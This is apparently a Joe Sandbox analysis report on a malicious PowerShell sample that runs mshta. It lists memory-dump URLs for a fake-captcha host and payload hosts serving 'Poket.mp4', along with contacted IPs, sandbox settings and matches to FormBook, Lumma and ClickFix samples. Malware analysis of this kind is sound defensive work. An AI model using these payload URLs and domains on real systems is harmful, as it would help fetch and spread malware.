00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dPmshta.exe, 00000002.00000003.1878800373.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893827664.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://deduhko.klpowershell.exe, 00000006.00000002.2214673362.0000000006CA6000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        https://deduhko2.kliphuwatey.shop/Poket.mp4RRC:mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://contoso.com/Licensepowershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://deduhko.klipzyroloo.shoppowershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          		unknown
          https://g.live.com/odclientsettings/ProdV2.C:edb.log.3.drfalse
            		high
            https://aka.ms/pscore6powershell.exe, 00000000.00000002.1667002839.0000018B80023000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://deduhko2.kliphuwatey.shop/Poket.mp4publicmshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dlmshta.exe, 00000002.00000002.1893706123.000001F01B450000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dhmshta.exe, 00000002.00000002.1893827664.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878800373.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://deduhko2.kliphuwatey.shop/Px&mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://g.live.com/odclientsettings/Prod.C:edb.log.3.drfalse
                		high
                https://g.live.com/odclientsettings/ProdV2edb.log.3.drfalse
                  		high
                  https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2183959871.0000000004561000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://deduhko2.kliphuwatey.shop/Poket.mp4Gmshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1849792547.000001E5E9796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1849792547.000001E5E9654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://deduhko2.kliphuwatey.shop/mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://deduhko.klipzyroloo.shoppowershell.exe, 00000006.00000002.2183959871.0000000004A70000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://deduhko2.kliphuwatey.shop/Poket.mp49280-654d-44b7-add6-a7ba0821d64d:mshta.exe, 00000002.00000002.1893827664.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878800373.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1667002839.0000018B8009D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811581786.000001E5D95E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2183959871.0000000004561000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://deduhko2.kliphuwatey.shop/Poket.mp4https://deduhko2.kliphuwatey.shop/Poket.mp4mshta.exe, 00000002.00000003.1888626567.000001F822FF6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.microsoftvupowershell.exe, 00000006.00000002.2182040392.000000000086A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://deduhko2.kliphuwatey.shop/Poket.mp47mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000003.00000003.1696559513.0000026275AD2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drfalse
                            		high
                            https://solve.vwXpowershell.exe, 00000000.00000002.1667002839.0000018B804F4000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://deduhko2.kliphuwatey.shop/Poket.mp4nmshta.exe, 00000002.00000002.1894476182.000001F81D6E0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1849792547.000001E5E9796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1849792547.000001E5E9654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://deduhko2.kliphuwatey.shop/Poket.mp4...smshta.exe, 00000002.00000003.1878800373.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893827664.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://deduhko2.kliphuwatey.shop/Poket.mp4gmshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://contoso.com/Iconpowershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://solve.vwglq.com/Rmshta.exe, 00000002.00000003.1874624534.000001F01B4E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893892244.000001F01B4EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.ver)svchost.exe, 00000003.00000002.2901323035.0000026275800000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://deduhko2.kliphuwatey.shop/Poket.mp4_mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://deduhko2.kliphuwatey.shop/Poket.mp4Ymshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://solve.vwglq.com/Zmshta.exe, 00000002.00000003.1874624534.000001F01B4E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893892244.000001F01B4EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dC:mshta.exe, 00000002.00000002.1893706123.000001F01B450000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d.mshta.exe, 00000002.00000002.1893706123.000001F01B476000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://deduhko2.kliphuwatey.shop/Poket.mp4...mshta.exe, 00000002.00000003.1877520508.000001F821E6D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1877800975.000001F821E6D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1895973024.000001F821E6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000003.00000003.1696559513.0000026275AD2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drfalse
                                            		high
                                            https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dlorerY)mshta.exe, 00000002.00000002.1894016581.000001F01B6A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://aka.ms/pscore68powershell.exe, 00000000.00000002.1667002839.0000018B8006B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811581786.000001E5D95E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://deduhko2.kliphuwatey.shop/Poket.mp4wmshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dHmshta.exe, 00000002.00000002.1893645402.000001F01B3F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://deduhko2.kliphuwatey.shop/Poket.mp4LMEMXmshta.exe, 00000002.00000002.1895547199.000001F8210F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1875575722.000001F8210F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1879974812.000001F8210F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878062600.000001F8210F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                188.114.97.3
                                                		solve.vwglq.comEuropean Union
                                                		13335CLOUDFLARENETUStrue
                                                172.67.144.62
                                                		deduhko2.kliphuwatey.shopUnited States
                                                		13335CLOUDFLARENETUSfalse

                                                Private

                                                IP
                                                127.0.0.1

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1582960
                                                Start date and time:2025-01-01 05:35:08 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 5m 34s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:12
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:1.ps1
                                                Detection:MAL
                                                Classification:mal84.evad.winPS1@11/15@3/3
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 44
                                                • Number of non-executed functions: 11
                                                Cookbook Comments:
                                                • Found application associated with file extension: .ps1

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.12.23.50, 13.107.246.45
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target mshta.exe, PID 7584 because there are no executed function
                                                • Execution Graph export aborted for target powershell.exe, PID 7432 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 7772 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 8128 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                23:36:01API Interceptor2x Sleep call for process: svchost.exe modified
                                                23:36:02API Interceptor90x Sleep call for process: powershell.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                • www.rgenerousrs.store/o362/
                                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                • www.beylikduzu616161.xyz/2nga/
                                                Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                ce.vbsGet hashmaliciousUnknownBrowse
                                                • paste.ee/d/lxvbq
                                                Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                • www.ssrnoremt-rise.sbs/3jsc/
                                                QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • filetransfer.io/data-package/zWkbOqX7/download
                                                http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                • kklk16.bsyo45ksda.top/favicon.ico
                                                gusetup.exeGet hashmaliciousUnknownBrowse
                                                • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                • gmtagency.online/api/check
                                                172.67.144.62http://classicshell.mediafire.com/file/d5llbbm8wu92jg8/ClassicShellSetup_4_3_1.exeGet hashmaliciousUnknownBrowse
                                                  https://asacannes.com/quelle-pression-de-pneu-sur-ford-puma/Get hashmaliciousUnknownBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    deduhko.klipzyroloo.shopPoket.mp4.htaGet hashmaliciousLummaCBrowse
                                                    • 188.114.97.3

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUShttps://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                    • 188.114.97.3
                                                    setup.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.30.45
